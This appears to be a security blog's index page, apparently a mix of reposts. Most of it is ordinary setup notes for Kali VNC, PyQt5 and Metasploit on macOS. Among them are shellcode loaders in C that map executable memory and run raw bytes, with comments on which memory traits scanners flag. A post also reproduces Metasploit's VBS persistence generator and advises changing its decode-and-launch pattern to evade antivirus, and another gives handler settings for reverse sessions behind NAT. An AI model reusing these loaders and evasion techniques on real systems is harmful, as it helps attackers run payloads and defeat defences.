Original: https://khr0x40sh.wordpress.com/2012/05/22/msf-startup-at-boot-using-msfrpcd-msgpack-msf-rc-files-for-disaster-recovery/
Continue reading Repost: MSF Startup at boot? Using msfrpcd, msgpack, & msf rc files for “disaster recovery”
Category: Uncategorized
Kali + VNC: an alternative to LXDE
Reposted from: https://forums.kali.org/showthread.php?26823-Remote-access-with-SSH-TightVNC-failed-with-new-Kali-2-0
I have, but it involves installing the MATE desktop environment, which is a GNOME 2 fork.
First, you have to install MATE:
$ sudo apt-get install mate-core mate-desktop-environment-extra mate-desktop-environment-extras mate-themes
Then, you have to change a line in the ~/.vnc/xstartup, replacing
/etc/X11/Xsession
with
/usr/bin/mate-session
It is just a workaround, as MATE offers a different look and feel than GNOME.
The underlying problems with GNOME and VNC (and RDP, NX, …) are described here:
https://bugs.debian.org/cgi-bin/bugr…cgi?bug=776746
https://bugs.launchpad.net/ubuntu/+s…n/+bug/1251281
and it looks like a fix for Debian will take some time…
Routing traffic through Tor
A few shellcode loaders (reposted)
Reference: https://github.com/VeroFess/shellcode_loader/blob/master/loader.c
#include <stdio.h>
#include <string.h>   /* memcpy, needed on both platforms */

#ifdef _MSC_VER
#define forceinline static __forceinline
#elif defined __GNUC__
#define forceinline static __inline__ __attribute__((always_inline))
#else
#define forceinline static
#endif

#if defined(__linux__)   /* the original tested the non-standard macro "linux" */
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>   /* close() */
#ifdef __x86_64__
#define __VM_X64
#elif __i386__
#define __VM_X32
#endif
/* One RWX mapping backed by /dev/zero; an anonymous rwxp region like this is
 * exactly what memory-scanning EDR and /proc/self/maps hunting look for. */
forceinline void * __runable_malloc(int size)
{
    int fd = open("/dev/zero", O_RDONLY);
    void * ret = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE, fd, 0);
    close(fd);
    return ret;   /* MAP_FAILED is not checked; a failed mmap crashes in memcpy */
}
#else
#include <Windows.h>
#ifdef _WIN64
#define __VM_X64
#else
#define __VM_X32
#endif
/* Same thing on Windows: a PAGE_EXECUTE_READWRITE commit. */
forceinline void * __runable_malloc(int size)
{
    return VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
}
#endif

/* Copy the shellcode into the executable buffer and append a ret (0xc3)
 * so it can be called as an ordinary function. */
forceinline void * __makefunction(unsigned char * shellcode, int len)
{
    void * address_shellcode = __runable_malloc(len + 1);
    memcpy((char *)address_shellcode, shellcode, len);
    *((char *)address_shellcode + len) = 0xc3;
    return address_shellcode;
}

int main()
{
    typedef unsigned long (*func)();
#ifdef __VM_X64
    unsigned char shellcode[] = { 0x48,0xC7,0xC0,0x01,0x00,0x00,0x00 }; /* mov rax, 1 */
#else
    unsigned char shellcode[] = { 0xb8,0x01,0x00,0x00,0x00 };           /* mov eax, 1 */
#endif
    func fun = (func)__makefunction(shellcode, sizeof(shellcode));
    unsigned long ret = fun();
    printf("ret is : %lu\n", ret);
    getchar();
    return 0;
}
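The loader above keeps one page readable, writable and executable for its whole lifetime, which is the simplest thing a memory scanner can flag. As an added example (my own code, not the reposted loader and not anything from the VeroFess repository), the Linux version of the same idea with the page staged RW, flipped to RX with mprotect before the call, and then checked against /proc/self/maps the way a hunting script would. The stub bytes are constructed test payloads that just return 1; the function names load_shellcode_rx, run_demo and demo_page_is_rx_only are mine.

```c
/* Added example: W^X shellcode staging on Linux (not the page's loader). */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/mman.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux value, in case strict-ANSI headers hide it */
#endif

typedef uintptr_t (*sc_fn)(void);

/* Round up to whole pages so mprotect covers everything that was copied. */
static size_t page_round(size_t len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    return (len + page - 1) & ~(page - 1);
}

/* mmap RW (anonymous, no /dev/zero fd), copy, sync the icache, mprotect RX.
 * Returns NULL on any failure, never a half-prepared mapping. */
static void *load_shellcode_rx(const unsigned char *code, size_t len)
{
    size_t size = page_round(len);
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return NULL;
    memcpy(mem, code, len);
    /* Needed on ARM (separate I/D caches); a no-op on x86. */
    __builtin___clear_cache((char *)mem, (char *)mem + len);
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return NULL;
    }
    return mem;
}

static void unload_shellcode(void *mem, size_t len)
{
    munmap(mem, page_round(len));
}

/* Permission string ("r-xp", "rwxp", ...) of the mapping containing addr,
 * read from /proc/self/maps: the same data a scan for anonymous rwxp regions
 * uses. Returns 1 if found, 0 if not found or /proc is unavailable. */
static int mapping_perms(const void *addr, char perms[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return 0;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char p[5];
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) != 3)
            continue;
        if ((uintptr_t)addr >= lo && (uintptr_t)addr < hi) {
            memcpy(perms, p, 5);
            found = 1;
            break;
        }
    }
    fclose(f);
    return found;
}

/* Constructed stub: load 1 into the return register, then return.
 * The ret is part of the bytes here instead of being appended by the loader. */
#if defined(__x86_64__)
static const unsigned char kStub[] = { 0x48,0xC7,0xC0,0x01,0x00,0x00,0x00, 0xC3 }; /* mov rax,1 ; ret */
#elif defined(__i386__)
static const unsigned char kStub[] = { 0xB8,0x01,0x00,0x00,0x00, 0xC3 };           /* mov eax,1 ; ret */
#elif defined(__aarch64__)
static const unsigned char kStub[] = { 0x20,0x00,0x80,0xD2, 0xC0,0x03,0x5F,0xD6 }; /* mov x0,#1 ; ret */
#else
#error "no test stub for this architecture"
#endif

/* Load, call and unload the stub; returns its return value, or -1 if loading failed. */
int run_demo(void)
{
    void *fn = load_shellcode_rx(kStub, sizeof kStub);
    if (!fn)
        return -1;
    int rc = (int)((sc_fn)fn)();
    unload_shellcode(fn, sizeof kStub);
    return rc;
}

/* 1 if the loaded page is reported as r-xp (no write bit), 0 if it shows
 * anything else, -1 if /proc/self/maps could not be read. */
int demo_page_is_rx_only(void)
{
    void *fn = load_shellcode_rx(kStub, sizeof kStub);
    if (!fn)
        return 0;
    char perms[5] = {0};
    int ok = mapping_perms(fn, perms);
    unload_shellcode(fn, sizeof kStub);
    return ok ? (strcmp(perms, "r-xp") == 0) : -1;
}

int main(void)
{
    printf("page perms rx-only: %d\n", demo_page_is_rx_only());
    printf("stub returned %d\n", run_demo());
    return 0;
}
```

The mapping still appears as an anonymous executable region, so this only removes the rwxp indicator; it does not hide the staged code from a scan that looks for executable memory not backed by a file.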
Evading AV with msf persistence
The persistence module calls:
/usr/local/share/metasploit-framework/modules/exploits/windows/local/persistence.rb
exe = generate_payload_exe
# Generate the vbs payload
vprint_status("Generating VBS persistent script (#{rvbs_name})")
vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
::Msf::Util::EXE.to_exe_vbs comes from /usr/local/share/metasploit-framework/lib/msf/util/exe.rb
# self.to_exe_vbs
#
# @param exes [String]
# @param opts [Hash]
# @option opts [String] :delay
# @option opts [String] :persist
# @option opts [String] :exe_filename
def self.to_exe_vbs(exes = '', opts = {})
  delay   = opts[:delay] || 5
  persist = opts[:persist] || false

  # Every identifier in the VBS template is replaced with a random 8-16 letter name;
  # only the names change, the script's structure does not.
  hash_sub = {}
  hash_sub[:exe_filename]     = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
  hash_sub[:base64_filename]  = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
  hash_sub[:var_shellcode]    = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_fname]        = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_func]         = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_obj]          = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_shell]        = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_tempdir]      = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_tempexe]      = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_basedir]      = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
  hash_sub[:var_decodefunc]   = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_xml]          = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_xmldoc]       = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_decoded]      = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_adodbstream]  = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
  hash_sub[:init] = ""

  # Persistence is just the launcher call wrapped in an endless Do/Loop with a sleep.
  if persist
    hash_sub[:init] << "Do\r\n"
    hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
    hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n"
    hash_sub[:init] << "Loop\r\n"
  else
    hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
  end

  read_replace_script_template("to_exe.vbs.template", hash_sub)
end
to_exe.vbs.template comes from /usr/local/share/metasploit-framework/data/templates/scripts/to_exe.vbs.template
Then transform and obfuscate as you like. Note that the stock generator only randomises identifier names; the behaviour the substituted variables point at (MSXML base64 decode, ADODB.Stream writing an .exe into the temp directory, WScript.Shell launching it, a Do/Loop with WScript.Sleep) is the same in every sample, so that pattern, not the names, is what signatures key on and what the obfuscation has to change.
msf tips: session is not valid and will be closed
When the IP the handler can bind locally differs from the externally reachable IP (NAT, port forwarding, VPS redirector):
LHOST and LPORT are baked into the payload so the beacon can find the handler; set them to the external address.
ReverseListenerBindHost is the address the handler actually binds to locally (the internal interface).
AutoVerifySession also had to be disabled (reason unknown).
Issue:
https://github.com/rapid7/metasploit-framework/issues/6799
See:
https://github.com/rapid7/metasploit-framework/wiki/Debugging-Dead-Meterpreter-Sessions
Continue reading msf tips: session is not valid and will be closed
Setting up a PyQt5 development environment
1. eric IDE
http://eric-ide.python-projects.org/eric-download.html
Installation using PyQt5 wheels
Installing eric6 and its pre-requisites is easy using the PyQt5 Python wheels. In order to have access to the suite of Qt tools and documentation it is recommended to install the Qt development environment because these tools are not part of the PyQt5 wheels.
Download the Qt online installer from the Qt download site.
Install Qt by executing the installer.
Install the eric6 pre-requisites (PyQt, sip and QScintilla) by entering this command in a shell / command window:
pip install qscintilla
or
pip3 install qscintilla
This will install QScintilla and all dependencies, which are PyQt5 and sip.
Install eric6 and configure the path to the Qt tools on the Qt page of the configuration dialog.
Once the eric6 IDE is started the Qt documentation may be loaded into the eric web browser via the Settings ➡ Manage Qt Help Documents menu entry. Note that the documentation (Python/Qt/PyQt) is available in QtHelp format as of November 2016 as documentation plug-ins. In order to use this feature, eric 16.11 or newer needs to be installed.
Continue reading Setting up a PyQt5 development environment
rbenv tips
Some tips about Ruby
Continue reading rbenv tips
Security vulnerabilities: concept and classification
A refresher; reposted from http://sec.chinabyte.com/165/12946665.shtml
Continue reading Security vulnerabilities: concept and classification
Tips for errors when installing Metasploit on macOS
The Ruby pg gem fails to build:
ARCHFLAGS="-arch x86_64" bundle install
Ruby version
Use rbenv; check which Ruby version Metasploit recommends on GitHub (the repository's .ruby-version file).
Nokogiri build error
http://stackoverflow.com/questions/24091869/installing-nokogiri-on-osx-10-10-yosemite
First install:
brew tap homebrew/dupes
brew install libxml2 libxslt
brew install libiconv
Then:
gem install nokogiri -v '1.6.8.1' -- --with-iconv-dir=/usr/local/Cellar/libiconv/1.14/ --use-system-libraries=true --with-xml2-include=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/libxml2/
PostgreSQL will not start / cannot connect
Cause: after the 9.5 to 9.6 upgrade the old data directory is incompatible with the new server. The fix below throws away the existing databases (fine for a fresh msf install; pg_upgrade is the non-destructive route):
brew uninstall postgresql
Delete /usr/local/var/postgres/
Reinstall